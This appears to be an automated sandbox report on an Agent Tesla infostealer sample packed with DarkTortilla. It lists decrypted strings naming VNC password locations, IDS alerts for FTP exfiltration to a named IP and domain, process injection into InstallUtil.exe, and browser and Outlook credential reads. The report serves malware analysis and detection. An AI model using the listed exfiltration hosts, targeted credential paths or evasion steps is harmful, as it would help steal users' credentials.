Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: TigerVNC
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Software\TigerVNC\Server
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: UltraVNC
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: passwd
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: UltraVNC
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: passwd2
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: UltraVNC
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: passwd
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: UltraVNC
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: passwd2
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: UltraVNC
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: passwd
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: UltraVNC
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: passwd2
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: UltraVNC
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: passwd
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: UltraVNC
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini

Source: wva4mZuUb4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: wva4mZuUb4.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.7:49846 -> 162.241.203.30:44938
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.7:49835 -> 162.241.203.30:21

Source: global traffic

TCP traffic: 192.168.2.7:49846 -> 162.241.203.30:44938

Source: Joe Sandbox View	IP Address: 162.241.203.30 162.241.203.30
Source: Joe Sandbox View	IP Address: 162.241.203.30 162.241.203.30

Source: Joe Sandbox View

ASN Name: OIS1US OIS1US

Source: unknown

FTP traffic detected: 162.241.203.30:21 -> 192.168.2.7:49835 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 150 allowed.220-Local time is now 13:29. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 150 allowed.220-Local time is now 13:29. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 150 allowed.220-Local time is now 13:29. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: ftp.aminhacorretora.com.br

Source: InstallUtil.exe, 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aminhacorretora.com.br
Source: InstallUtil.exe, 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.aminhacorretora.com.br
Source: InstallUtil.exe, 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Source: C:\Users\user\Desktop\wva4mZuUb4.exe

Code function: 0_2_08F0BC58 CreateProcessAsUserW,

0_2_08F0BC58

Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_00F408B8	0_2_00F408B8
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_00F41218	0_2_00F41218
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_01378388	0_2_01378388
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_0137147E	0_2_0137147E
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_01371B08	0_2_01371B08
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_01377D60	0_2_01377D60
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_014EF3D1	0_2_014EF3D1
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_014EF3E0	0_2_014EF3E0
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_014ED5EC	0_2_014ED5EC
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_062706E0	0_2_062706E0
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_06274A58	0_2_06274A58
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_077A4560	0_2_077A4560
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_077A0040	0_2_077A0040
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_077A0007	0_2_077A0007
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_0780D780	0_2_0780D780
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_0780EFF8	0_2_0780EFF8
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_0780CF08	0_2_0780CF08
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_0780BEEB	0_2_0780BEEB
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_0780AE53	0_2_0780AE53
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_07808DB8	0_2_07808DB8
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_0780E148	0_2_0780E148
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_0780401E	0_2_0780401E
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_07802F80	0_2_07802F80
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_0780CECF	0_2_0780CECF
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F01820	0_2_08F01820
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F0C1D8	0_2_08F0C1D8
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F06D70	0_2_08F06D70
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F06620	0_2_08F06620
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F04B50	0_2_08F04B50
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F00040	0_2_08F00040
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F01810	0_2_08F01810
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F00013	0_2_08F00013
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F01400	0_2_08F01400
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F011C8	0_2_08F011C8
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F09DB0	0_2_08F09DB0
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F011B9	0_2_08F011B9
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F0A518	0_2_08F0A518
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F08A70	0_2_08F08A70
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F01678	0_2_08F01678
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F08A60	0_2_08F08A60
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F01668	0_2_08F01668
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F00E10	0_2_08F00E10
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F0661B	0_2_08F0661B
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F013F0	0_2_08F013F0
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F023D0	0_2_08F023D0
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F05B68	0_2_08F05B68
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F05B58	0_2_08F05B58
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F04B40	0_2_08F04B40
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F00B20	0_2_08F00B20
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F02321	0_2_08F02321
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_08F00B10	0_2_08F00B10
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_077A4535	0_2_077A4535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 10_2_02C140F0	10_2_02C140F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 10_2_02C14D08	10_2_02C14D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 10_2_02C14438	10_2_02C14438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 10_2_06631CB0	10_2_06631CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 10_2_06636820	10_2_06636820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 10_2_06633838	10_2_06633838
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 10_2_0666F648	10_2_0666F648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 10_2_06668740	10_2_06668740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 10_2_06667FC0	10_2_06667FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 10_2_0666E268	10_2_0666E268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 10_2_06664AB0	10_2_06664AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 10_2_066653D0	10_2_066653D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 10_2_06669000	10_2_06669000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 10_2_0666A928	10_2_0666A928

Source: wva4mZuUb4.exe, 00000000.00000002.1907192370.000000000113E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs wva4mZuUb4.exe
Source: wva4mZuUb4.exe, 00000000.00000002.1921308010.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs wva4mZuUb4.exe
Source: wva4mZuUb4.exe, 00000000.00000002.1921308010.0000000003F20000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs wva4mZuUb4.exe
Source: wva4mZuUb4.exe, 00000000.00000000.1238731347.000000000067E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameuy6ij.exe@ vs wva4mZuUb4.exe
Source: wva4mZuUb4.exe, 00000000.00000002.1922738564.00000000055F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTokenTableApp.dll> vs wva4mZuUb4.exe
Source: wva4mZuUb4.exe, 00000000.00000002.1928252547.0000000007BF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRP8SH.dll6 vs wva4mZuUb4.exe
Source: wva4mZuUb4.exe, 00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTokenTableApp.dll> vs wva4mZuUb4.exe
Source: wva4mZuUb4.exe, 00000000.00000002.1909018822.0000000003206000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs wva4mZuUb4.exe
Source: wva4mZuUb4.exe	Binary or memory string: OriginalFilenameuy6ij.exe@ vs wva4mZuUb4.exe

Source: wva4mZuUb4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: wva4mZuUb4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: wva4mZuUb4.exe, s2W4J.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/4@1/1

Source: C:\Users\user\Desktop\wva4mZuUb4.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wva4mZuUb4.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Mutant created: NULL

Source: wva4mZuUb4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: wva4mZuUb4.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\wva4mZuUb4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: wva4mZuUb4.exe

ReversingLabs: Detection: 71%

Source: unknown	Process created: C:\Users\user\Desktop\wva4mZuUb4.exe "C:\Users\user\Desktop\wva4mZuUb4.exe"
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Users\user\Desktop\wva4mZuUb4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\wva4mZuUb4.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: wva4mZuUb4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: wva4mZuUb4.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected DarkTortilla Crypter

Source: Yara match	File source: 0.2.wva4mZuUb4.exe.55f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wva4mZuUb4.exe.55f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1922738564.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1909018822.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wva4mZuUb4.exe PID: 7312, type: MEMORYSTR

.NET source code contains method to dynamically call methods (often used by packers)

Source: wva4mZuUb4.exe, b8E.cs

.Net Code: NewLateBinding.LateCall(obj7, (Type)null, "DynamicInvoke", new object[1] { new object[0] }, (string[])null, (Type[])null, (bool[])null, true)

Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_01378AB0 push eax; iretd	0_2_01379039
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_014EC409 push eax; retf	0_2_014EC40A
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_014E5049 push esp; retf	0_2_014E504A
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_0627D44F push ecx; retf EFCDh	0_2_0627D5BA
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_077A3733 push FFFFFFE9h; retn 0001h	0_2_077A3735
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_077AA1A9 push ecx; retf 0046h	0_2_077AA1CA
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_077AD07C pushad ; retf	0_2_077AD0D5
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_077AF21F push eax; iretd	0_2_077AF22E
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_0780A3ED push ds; retf 0040h	0_2_0780A43E
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_07807733 push edi; ret	0_2_0780792E
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_078081F1 push es; ret	0_2_07808200
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Code function: 0_2_0780793C push eax; ret	0_2_0780796D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 10_2_06661ED0 push es; ret	10_2_06661EE0

Source: wva4mZuUb4.exe

Static PE information: section name: .text entropy: 7.176062278190911

Source: wva4mZuUb4.exe, Aj8s9.cs	High entropy of concatenated method names: 'b6PCx', 'Xa0y5', 'j8L4Z', 'z8QAb', 'c0B6M', 'Gz5c8', 'Xf9j7', 'Hg03N', 'Tx5j8', 'Bf60Y'
Source: wva4mZuUb4.exe, s2W4J.cs	High entropy of concatenated method names: 'g9DHn', 'Lf07P', 'i1Q7A', 'i4KQf', 'q0MQe', 'z4GEp', 'Mx73X', 'Jo3t8', 'y7YAs', 'Bw8r1'
Source: wva4mZuUb4.exe, z8P.cs	High entropy of concatenated method names: 'j7QCd', 'Rx15T', 'Zq70P', 'Ai7y4', 'q4HKc', 'w5YPf', 'Dz6q1', 'Tj2q5', 'Ea31M', 'Ls26C'
Source: wva4mZuUb4.exe, Kx30R.cs	High entropy of concatenated method names: 'Ww38S', 'Ny95P', 'Zp31W', 'Zx29R', 'Xe05M', 'r7H5A', 'Ka9t5', 'Xw4y3', 't9XLn', 'y5X0N'

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\wva4mZuUb4.exe

File opened: C:\Users\user\Desktop\wva4mZuUb4.exe\:Zone.Identifier read attributes | delete

Jump to behavior

